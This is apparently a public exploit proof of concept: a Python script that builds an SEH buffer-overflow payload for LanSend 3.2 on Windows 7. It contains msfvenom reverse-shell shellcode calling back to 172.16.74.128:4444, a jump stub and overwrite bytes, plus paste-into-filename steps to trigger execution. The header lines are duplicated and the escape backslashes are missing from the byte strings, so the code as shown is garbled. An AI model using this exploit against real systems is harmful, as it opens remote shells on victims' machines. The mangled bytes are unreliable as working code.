LanSend 3.2 Buffer Overflow

# Exploit Title: LanSend 3.2 - Buffer Overflow (SEH)
# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: LanSend 3.2
# Vendor Homepage: https://lizardsystems.com# Exploit Author: gurbanli
# Date: 2020-05-12
# Vulnerable Software: LanSend 3.2
# Vendor Homepage: https://lizardsystems.com
# Version: 3.2
# Software Link: https://lizardsystems.com/download/lansend_setup.exe
# Tested on: Windows 7 x86

f = file('payload.txt','w')

"""
PoC
1. Run exploit
2. Run Lansend and Click Add Computers Wizard
3. Choose import computers from file
4. Copy/paste payload.txt content into filename section
5. shellcode will be executed

"""

"""
msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b 'x00x0ax0d'
"""

shellcode = b""
shellcode += b"xdaxd0xd9x74x24xf4x58xbexa4x95xaf"
shellcode += b"xc4x2bxc9xb1x52x31x70x17x03x70x17"
shellcode += b"x83x4cx69x4dx31x70x7ax10xbax88x7b"
shellcode += b"x75x32x6dx4axb5x20xe6xfdx05x22xaa"
shellcode += b"xf1xeex66x5ex81x83xaex51x22x29x89"
shellcode += b"x5cxb3x02xe9xffx37x59x3exdfx06x92"
shellcode += b"x33x1ex4excfxbex72x07x9bx6dx62x2c"
shellcode += b"xd1xadx09x7exf7xb5xeex37xf6x94xa1"
shellcode += b"x4cxa1x36x40x80xd9x7ex5axc5xe4xc9"
shellcode += b"xd1x3dx92xcbx33x0cx5bx67x7axa0xae"
shellcode += b"x79xbbx07x51x0cxb5x7bxecx17x02x01"
shellcode += b"x2ax9dx90xa1xb9x05x7cx53x6dxd3xf7"
shellcode += b"x5fxdax97x5fx7cxddx74xd4x78x56x7b"
shellcode += b"x3ax09x2cx58x9ex51xf6xc1x87x3fx59"
shellcode += b"xfdxd7x9fx06x5bx9cx32x52xd6xffx5a"
shellcode += b"x97xdbxffx9axbfx6cx8cxa8x60xc7x1a"
shellcode += b"x81xe9xc1xddxe6xc3xb6x71x19xecxc6"
shellcode += b"x58xdexb8x96xf2xf7xc0x7cx02xf7x14"
shellcode += b"xd2x52x57xc7x93x02x17xb7x7bx48x98"
shellcode += b"xe8x9cx73x72x81x37x8ex15x02xd7xda"
shellcode += b"x65x32xdaxdax74x9fx53x3cx1cx0fx32"
shellcode += b"x97x89xb6x1fx63x2bx36x8ax0ex6bxbc"
shellcode += b"x39xefx22x35x37xe3xd3xb5x02x59x75"
shellcode += b"xc9xb8xf5x19x58x27x05x57x41xf0x52"
shellcode += b"x30xb7x09x36xacxeexa3x24x2dx76x8b"
shellcode += b"xecxeax4bx12xedx7fxf7x30xfdxb9xf8"
shellcode += b"x7cxa9x15xafx2ax07xd0x19x9dxf1x8a"
shellcode += b"xf6x77x95x4bx35x48xe3x53x10x3ex0b"
shellcode += b"xe5xcdx07x34xcax99x8fx4dx36x3ax6f"
shellcode += b"x84xf2x5ax92x0cx0fxf3x0bxc5xb2x9e"
shellcode += b"xabx30xf0xa6x2fxb0x89x5cx2fxb1x8c"
shellcode += b"x19xf7x2axfdx32x92x4cx52x32xb7"

"""
047FFF09 59 POP ECX
047FFF0A 59 POP ECX
047FFF0B 80C1 64 ADD CL,64
047FFF0E ^FFE1 JMP ECX
"""
jmp_to_shellcode = 'x59x59x80xc1x64xffxe1'

"""ppr 00417a47"""

payload = 'x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + 'xebxebx90x90' + 'x47x7ax41'
f.write(payload)
f.close()